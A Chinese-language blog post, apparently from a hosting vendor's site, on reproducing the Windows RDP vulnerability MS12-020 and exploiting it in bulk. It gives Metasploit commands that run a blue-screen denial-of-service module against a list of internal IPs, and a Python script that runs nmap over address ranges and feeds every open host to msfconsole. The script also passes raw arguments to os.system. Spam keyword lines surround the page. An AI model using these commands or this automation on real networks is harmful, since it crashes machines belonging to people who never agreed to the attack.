91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

MS12-020漏洞復現及自動化批量利用

發布時間:2020-06-21 11:07:43 來源:網絡 閱讀:1633 作者:Owefsad 欄目:安全技術

漏洞描述

Windows 遠程桌面協議漏洞,可執行代碼,POC可導致藍屏。(RDP遠程桌面執行代碼漏洞)

影響目標

Windows XP sp3
Windows xp sp2
Windows Vista sp2
Windows 7
Windows Server 2003
Windows Server 2008
Windows Server 2008 R2

msfpayload利用

msfconsole
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhost <ip>
run

此pyload僅支持單目標。

通過msfconsole快速啟動

msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10;run;set rhost 10.129.10.37;run;set rhost 10.129.10.169;run;set rhost 10.129.10.209;run;set rhost 10.129.10.232;run;"

通過bash腳本批量生成檢測腳本(nmap-port2ip.py)

#encoding:utf-8
import xml.sax
import sys
import os

class MovieHandler( xml.sax.ContentHandler ):
   def __init__(self, filterport=None):
      self.CurrentData = ""
      self.port=filterport
      self.data = ""
      self.datas=[]

   # 元素開始事件處理
   def startElement(self, tag, attributes):
      self.CurrentData = tag
      if tag == "address":
         self.data=attributes["addr"]

   # 元素結束事件處理
   def endElement(self, tag):
      if self.CurrentData == "address":
         self.datas.append(self.data)
         self.data=""
      self.CurrentData = ""
class Gather(object):
    def __init__(self, filterport=None):
        # 創建一個 XMLReader
        self.parser = xml.sax.make_parser()
        # turn off namepsaces
        self.parser.setFeature(xml.sax.handler.feature_namespaces, 0)

        # 重寫 ContextHandler
        self.Handler = MovieHandler(filterport)
        self.parser.setContentHandler( self.Handler )
    def run(self, port):
        self.Handler.datas=[]
        self.parser.parse(port+".xml")
        print(self.Handler.datas)
    def get_ans(self):
        return self.Handler.datas

if __name__ == "__main__":
    if len(sys.argv) !=3:
        os.exit()
    os.system("nmap "+sys.argv[1]+" -p "+sys.argv[2]+" --open -oX "+sys.argv[2]+".xml")
    g = Gather()
    g.run(sys.argv[2])
    # create cmd
    cmd = '"use auxiliary/scanner/rdp/ms12_020_check;set threads 20;'

    ips = g.get_ans()
    if len(ips)>0:
        for ip in g.get_ans():
            cmd += "set rhosts "+ip+";run;"
        cmd += 'exit;"'
        os.system("msfconsole -x " + cmd)
# 使用方法
python nmap-port2ip.py <ip> <port>
# 功能:針對某種服務的漏洞對指定IP段的所有主機進行檢測,獲取可能存在問題的主機IP,并調用對應的Msf Payload進行利用嘗試。
# ip可支持單一IP、CIDR形式IP、10.129.1.1-154等幾種,格式與nmap一致
# port僅支持單端口

漏洞補丁檢測

systeminfo | find /i "KB2621440"
如果存在結果如下,證明已打補丁,否則,需要打對應的補丁。

Windows Server 2003補丁

參考文章

  1. 微軟MS12-020
向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

襄垣县| 万源市| 霍州市| 九江县| 清远市| 高唐县| 启东市| 保定市| 务川| 理塘县| 清远市| 杭锦旗| 弥渡县| 石首市| 库车县| 洮南市| 双城市| 恩施市| 张家界市| 开鲁县| 新余市| 铅山县| 汕头市| 连州市| 苍梧县| 云浮市| 桃源县| 全州县| 宁陵县| 潍坊市| 扬中市| 新巴尔虎右旗| 海宁市| 正镶白旗| 屏东市| 温宿县| 黄石市| 嘉义县| 永福县| 崇礼县| 海兴县|